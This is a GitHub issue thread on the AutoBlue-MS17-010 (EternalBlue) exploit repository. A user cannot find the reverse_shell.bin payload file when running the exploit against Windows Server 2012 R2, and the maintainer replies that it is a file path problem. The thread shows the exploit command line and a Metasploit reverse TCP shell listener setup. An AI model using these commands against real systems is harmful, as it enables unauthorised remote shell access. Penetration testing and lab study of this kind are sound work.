3ndG4me / AutoBlue-MS17-010

This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010
MIT License
1.19k stars 311 forks source link

FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin' #43

Closed luoev closed 10 months ago

luoev commented 1 year ago

thanks for your click

attack :kali 2021 be attacked : windows server 2012 r2

when i compile
python eternalblue_exploit8.py (windows server 2012 r2 's ip) reverse_shell.bin 500 Traceback (most recent call last): File "/home/kali/desktop/eternalblue_exploit8.py", line 542, in fp = open(sys.argv[2], 'rb') ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'

how to solve it?

I use a translator and my english is poor , please forgive me if there are some errors

luoev commented 1 year ago

i also use msfconsole

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp payload => windows/x64/shell/reverse_tcp msf6 exploit(multi/handler) > set lhost () lhost => () msf6 exploit(multi/handler) > set lport 9090 lport => 9090 msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on ()

3ndG4me commented 10 months ago

This seems like a path issue with your usage, this error means that the file "reverse_shell.bin" is not in the same directory as the exploit script. You either need to move it to the same location or specify the full file path.